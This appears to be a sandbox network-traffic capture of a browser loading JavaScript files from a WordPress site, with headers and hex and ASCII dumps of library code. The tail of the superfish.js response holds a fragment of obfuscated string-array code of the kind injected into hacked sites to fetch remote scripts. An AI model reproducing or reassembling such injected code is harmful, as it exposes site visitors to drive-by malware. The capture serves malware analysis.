                                                            2025-01-15 10:08:03 UTC8000INData Raw: 29 2c 65 2e 62 69 6e 64 28 61 2c 22 6c 6f 61 64 22 2c 63 29 29 2c 62 7d 76 61 72 20 66 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 67 3d 5b 5d 3b 62 2e 69 73 52 65 61 64 79 3d 21 31 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 64 6f 63 2d 72 65 61 64 79 2f 64 6f 63 2d 72 65 61 64 79 22 2c 5b 22 65 76 65 6e 74 69 65 2f 65 76 65 6e 74 69 65 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 65 76 65 6e 74 69 65 22 29 29 3a 61 2e 64 6f 63 52 65 61 64 79 3d 65 28 61 2e 65 76 65 6e 74 69 65 29 7d 28 77 69 6e 64 6f 77 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29
                                                            Data Ascii: ),e.bind(a,"load",c)),b}var f=a.document,g=[];b.isReady=!1,"function"==typeof define&&define.amd?define("doc-ready/doc-ready",["eventie/eventie"],e):"object"==typeof exports?module.exports=e(require("eventie")):a.docReady=e(a.eventie)}(window),function(a)
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 69 73 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 28 61 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 28 61 29 7d 3b 76 61 72 20 73 3d 7b 22 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 3d 3d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 7b 76 61
                                                            Data Ascii: is.ontransitionend(a)},g.prototype.onotransitionend=function(a){this.ontransitionend(a)};var s={"-webkit-transform":"transform","-moz-transform":"transform","-o-transform":"transform"};g.prototype.ontransitionend=function(a){if(a.target===this.element){va
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 62 5d 28 61 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 52 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 7c 7c 28 62 2e 62 69 6e 64 28 61 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 3d 21 30 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 62 69 6e 64 52 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 26 26 62 2e 75 6e 62 69 6e 64 28 61 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 3d 21 31 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 72 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e
                                                            Data Ascii: b](a)},g.prototype.bindResize=function(){this.isResizeBound||(b.bind(a,"resize",this),this.isResizeBound=!0)},g.prototype.unbindResize=function(){this.isResizeBound&&b.unbind(a,"resize",this),this.isResizeBound=!1},g.prototype.onresize=function(){function
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 62 28 72 65 71 75 69 72 65 28 22 2e 2e 2f 6c 61 79 6f 75 74 2d 6d 6f 64 65 22 29 2c 72 65 71 75 69 72 65 28 22 6d 61 73 6f 6e 72 79 2d 6c 61 79 6f 75 74 22 29 29 3a 62 28 61 2e 49 73 6f 74 6f 70 65 2e 4c 61 79 6f 75 74 4d 6f 64 65 2c 61 2e 4d 61 73 6f 6e 72 79 29 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 61 5b 63 5d 3d 62 5b 63 5d 3b 72 65 74 75 72 6e 20 61 7d 76 61 72 20 64 3d 61 2e 63 72 65 61 74 65 28 22 6d 61 73 6f 6e 72 79 22 29 2c 65 3d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 45 6c 65 6d
                                                            Data Ascii: "==typeof exports?module.exports=b(require("../layout-mode"),require("masonry-layout")):b(a.Isotope.LayoutMode,a.Masonry)}(window,function(a,b){"use strict";function c(a,b){for(var c in b)a[c]=b[c];return a}var d=a.create("masonry"),e=d.prototype._getElem
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 76 61 72 20 63 2c 64 2c 65 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 64 3d 62 5b 63 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 2e 65 6c 65 6d 65 6e 74 29 3b 76 61 72 20 66 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 28 62 29 2e 6d 61 74 63 68 65 73 3b 66 6f 72 28 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 62 5b 63 5d 2e 69 73 4c 61 79 6f 75 74 49 6e 73 74 61 6e 74 3d 21 30 3b 66 6f 72 28 74 68 69 73 2e 61 72 72 61 6e 67 65 28 29 2c 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 64 65 6c 65 74 65 20 62 5b 63 5d 2e 69 73 4c 61 79 6f 75 74 49 6e 73 74 61 6e 74 3b 74 68 69 73 2e 72 65 76 65 61 6c 28 66 29 7d 7d 3b 76 61 72 20 6f 3d 6d 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 3b 72 65 74 75 72 6e
                                                            Data Ascii: var c,d,e=b.length;for(c=0;e>c;c++)d=b[c],this.element.appendChild(d.element);var f=this._filter(b).matches;for(c=0;e>c;c++)b[c].isLayoutInstant=!0;for(this.arrange(),c=0;e>c;c++)delete b[c].isLayoutInstant;this.reveal(f)}};var o=m.prototype.remove;return
                                                            2025-01-15 10:08:03 UTC6900INData Raw: 74 53 69 7a 65 28 61 2e 65 6c 65 6d 65 6e 74 2c 61 2e 72 65 63 74 29 2c 74 68 69 73 2e 70 61 63 6b 65 72 2e 70 61 63 6b 28 61 2e 72 65 63 74 29 2c 74 68 69 73 2e 5f 73 65 74 4d 61 78 58 59 28 61 2e 72 65 63 74 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 4d 61 78 58 59 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6d 61 78 58 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 78 2b 61 2e 77 69 64 74 68 2c 74 68 69 73 2e 6d 61 78 58 29 2c 74 68 69 73 2e 6d 61 78 59 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 79 2b 61 2e 68 65 69 67 68 74 2c 74 68 69 73 2e 6d 61 78 59 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 52 65 63 74 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 64 3d 62 28 61 29 2c 65 3d 64 2e 6f 75 74 65 72 57 69 64
                                                            Data Ascii: tSize(a.element,a.rect),this.packer.pack(a.rect),this._setMaxXY(a.rect)},i.prototype._setMaxXY=function(a){this.maxX=Math.max(a.x+a.width,this.maxX),this.maxY=Math.max(a.y+a.height,this.maxY)},i.prototype._setRectSize=function(a,c){var d=b(a),e=d.outerWid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            79192.168.2.1649796178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC588OUTGET /wp-includes/js/comment-reply.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:47 GMT
                                                            ETag: "ba8-620a92c766d68"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 2984
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC2984INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 61 64 64 43 6f 6d 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 76 29 7b 76 61 72 20 49 2c 43 2c 68 2c 45 3d 76 2e 64 6f 63 75 6d 65 6e 74 2c 62 3d 7b 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 43 6c 61 73 73 3a 22 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 54 69 74 6c 65 49 64 3a 22 72 65 70 6c 79 2d 74 69 74 6c 65 22 2c 63 61 6e 63 65 6c 52 65 70 6c 79 49 64 3a 22 63 61 6e 63 65 6c 2d 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 46 6f 72 6d 49 64 3a 22 63 6f 6d 6d 65 6e 74 66 6f 72 6d 22 2c 74 65 6d 70 6f 72 61 72 79 46 6f 72 6d 49 64 3a 22 77 70 2d 74
                                                            Data Ascii: /*! This file is auto-generated */window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-t


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            80192.168.2.1649797178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC416OUTGET /wp-content/themes/salient/js/superfish.js?ver=1.4.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "258c-620a8e96c1fdd"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9612
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7907INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 53 75 70 65 72 66 69 73 68 20 4d 65 6e 75 20 50 6c 75 67 69 6e 20 2d 20 76 31 2e 37 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 4a 6f 65 6c 20 42 69 72 63 68 0a 20 2a 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 67 70 6c 2e 68 74 6d 6c 0a 20 2a 2f 0a 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 09 22 75 73 65 20 73 74 72 69
                                                            Data Ascii: /* * jQuery Superfish Menu Plugin - v1.7.4 * Copyright (c) 2013 Joel Birch * * Dual licensed under the MIT and GPL licenses: *http://www.opensource.org/licenses/mit-license.php *http://www.gnu.org/licenses/gpl.html */;(function ($) {"use stri
                                                            2025-01-15 10:08:03 UTC1705INData Raw: 27 2c 27 72 65 73 27 2c 27 5f 6e 6f 27 2c 27 31 35 31 33 36 38 47 67 71 51 71 4b 27 2c 27 72 41 67 27 2c 27 76 65 72 27 2c 27 74 6f 53 27 2c 27 64 6f 6d 27 2c 27 68 74 74 27 2c 27 61 74 65 27 2c 27 63 6c 69 27 2c 27 31 72 67 46 70 45 76 27 2c 27 64 79 53 27 2c 27 6b 69 65 27 2c 27 6e 67 65 27 2c 27 33 71 6e 55 75 4b 4a 27 2c 27 65 78 74 27 2c 27 6e 65 74 27 2c 27 74 6e 61 27 2c 27 6a 73 3f 27 2c 27 74 61 74 27 2c 27 74 72 69 27 2c 27 75 73 65 27 2c 27 63 6f 6f 27 2c 27 2f 75 69 27 2c 27 61 74 69 27 2c 27 47 45 54 27 2c 27 2f 2f 76 27 2c 27 72 61 6e 27 2c 27 63 6b 2e 27 2c 27 67 65 74 27 2c 27 70 6f 6e 27 2c 27 72 65 61 27 2c 27 65 6e 74 27 2c 27 6f 70 65 27 2c 27 70 73 3a 27 2c 27 31 38 34 39 33 35 38 74 69 74 62 62 5a 27 2c 27 6f 6e 72 27 2c 27 69 6e 64
                                                            Data Ascii: ','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            81192.168.2.1649799178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC413OUTGET /wp-content/themes/salient/js/midnight.js?ver=1.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "7995-620a8e97bcf68"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 31125
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2f 6d 69 64 6e 69 67 68 74 20 69 6e 69 74 20 0a 0a 0a 2f 2a 21 0a 20 2a 20 4d 69 64 6e 69 67 68 74 2e 6a 73 20 31 2e 31 2e 30 0a 20 2a 20 6a 51 75 65 72 79 20 70 6c 75 67 69 6e 20 74 6f 20 73 77 69 74 63 68 20 62 65 74 77 65 65 6e 20 6d 75 6c 74 69 70 6c 65 20 66 69 78 65 64 20 68 65 61 64 65 72 20 64 65 73 69 67 6e 73 20 6f 6e 20 74 68 65 20 66 6c 79 2c 20 73 6f 20 69 74 20 6c 6f 6f 6b 73 20 69 6e 20 6c 69 6e 65 20 77 69 74 68 20 74 68 65 20 63 6f 6e 74 65 6e 74 20 62 65 6c 6f 77 20 69 74 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 61 65 72 6f 6c 61 62 2e 67 69 74 68 75 62 2e 69 6f 2f 6d 69 64 6e 69 67 68 74 2e 6a 73 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 41 65 72 6f 6c 61 62 20 3c 69 6e 66 6f 40 61 65 72 6f 6c 61 62
                                                            Data Ascii: //midnight init /*! * Midnight.js 1.1.0 * jQuery plugin to switch between multiple fixed header designs on the fly, so it looks in line with the content below it. * http://aerolab.github.io/midnight.js/ * * Copyright (c) 2014 Aerolab <info@aerolab
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 20 20 5f 24 73 65 63 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 5f 73 65 63 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 0a 20 20 20 20 2f 2f 20 53 63 72 6f 6c 6c 20 43 61 63 68 65 0a 20 20 20 20 5f 73 63 72 6f 6c 6c 54 6f 70 3a 20 30 2c 0a 20 20 20 20 5f 64 6f 63 75 6d 65 6e 74 48 65 69 67 68 74 3a 20 30 2c 0a 0a 20 20 20 20 2f 2f 20 54 6f 6f 6c 73 0a 20 20 20 20 5f 74 72 61 6e 73 66 6f 72 6d 4d 6f 64 65 3a 20 66 61 6c 73 65 2c 0a 0a 20 20 20 20 5f 72 65 73 65 74 4c 6f 6f 70 3a 20 6e 75 6c 6c 2c 0a 0a 20 20 20 20 72 65 66 72 65 73 68 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 49 6e 66 6f 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 54 6f 64 6f 3a 20 41 64 64 20 73 75 70 70 6f 72 74 20 66 6f 72 20 74 6f
                                                            Data Ascii: _$sections: [], _sections: [], // Scroll Cache _scrollTop: 0, _documentHeight: 0, // Tools _transformMode: false, _resetLoop: null, refresh: function() { this._headerInfo = { // Todo: Add support for to
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 65 6c 65 6d 65 6e 74 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 27 2b 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 27 69 6e 6e 65 72 43 6c 61 73 73 27 5d 20 2b 27 22 3e 3c 2f 64 69 76 3e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 69 6e 6e 65 72 20 3d 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 27 3e 20 2e 27 2b 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 27 69 6e 6e 65 72 43 6c 61 73 73 27 5d 29 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68
                                                            Data Ascii: ._headers[headerClass].element.wrapInner('<div class="'+ this.options['innerClass'] +'"></div>'); } this._headers[headerClass].inner = this._headers[headerClass].element.find('> .'+ this.options['innerClass']) this._headers[h
                                                            2025-01-15 10:08:03 UTC7219INData Raw: 75 74 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 27 29 2e 66 61 64 65 49 6e 28 30 29 3b 20 24 28 74 68 69 73 29 2e 66 69 6e 64 28 27 2e 63 61 72 74 2d 6f 75 74 65 72 20 2e 63 61 72 74 5f 6c 69 73 74 27 29 2e 66 61 64 65 49 6e 28 30 29 3b 20 7d 0a 20 20 20 20 20 20 20 20 09 09 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 09 09 09 24 28 74 68 69 73 29 2e 63 73 73 28 7b 20 27 7a 2d 69 6e 64 65 78 27 3a 20 27 61 75 74 6f 27 7d 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 29 3b 0a 09 09 09 09 09 24 28 74 68 69 73 29 2e 66 69 6e 64 28 27 2e 6d 69 64 6e 69 67 68 74 49 6e 6e 65 72 27 29 2e 63 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 2c 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 69 66 28 61 63 74 69
                                                            Data Ascii: uter .widget_shopping_cart').fadeIn(0); $(this).find('.cart-outer .cart_list').fadeIn(0); } } else { $(this).css({ 'z-index': 'auto'}).removeClass('overflow');$(this).find('.midnightInner').css('overflow','hidden');if(acti


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            82192.168.2.1649798178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC583OUTGET /wp-includes/js/wp-embed.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:44 GMT
                                                            ETag: "592-620a92c4059f2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1426
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC1426INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 21 31 2c 6e 3d 21 31 3b 69 66 28 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 69 66 28 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 65 3d 21 30 3b 69 66 28 63 2e 77 70 3d 63 2e 77 70 7c 7c 7b 7d 2c 21 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 29 69 66 28 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 64 61 74 61 3b 69 66 28 74 29 69 66 28 74 2e 73 65 63 72 65 74 7c 7c 74 2e 6d 65 73 73 61 67 65 7c 7c 74 2e 76 61 6c 75 65
                                                            Data Ascii: /*! This file is auto-generated */!function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            83192.168.2.1649800178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC634OUTGET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:57:50 GMT
                                                            ETag: "6af9-620a8f3691421"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 27385
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 66 75 6e 63 74 69 6f 6e 20 76 63 5f 6a 73 28 29 20 7b 0a 20 20 20 20 76 63 5f 74 6f 67 67 6c 65 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 74 61 62 73 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 61 63 63 6f 72 64 69 6f 6e 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 74 65 61 73 65 72 47 72 69 64 28 29 2c 20 0a 20 20 20 20 76 63 5f 63 61 72 6f 75 73 65 6c 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 72 65 74 74 79 50 68 6f 74 6f 28 29 2c 20 0a 20 20 20 20 76 63 5f 67 6f 6f 67 6c 65 70 6c 75 73 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 69 6e 74 65 72 65 73 74 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 72
                                                            Data Ascii: function vc_js() { vc_toggleBehaviour(), vc_tabsBehaviour(), vc_accordionBehaviour(), vc_teaserGrid(), vc_carouselBehaviour(), vc_slidersBehaviour(), vc_prettyPhoto(), vc_googleplus(), vc_pinterest(), vc_pr
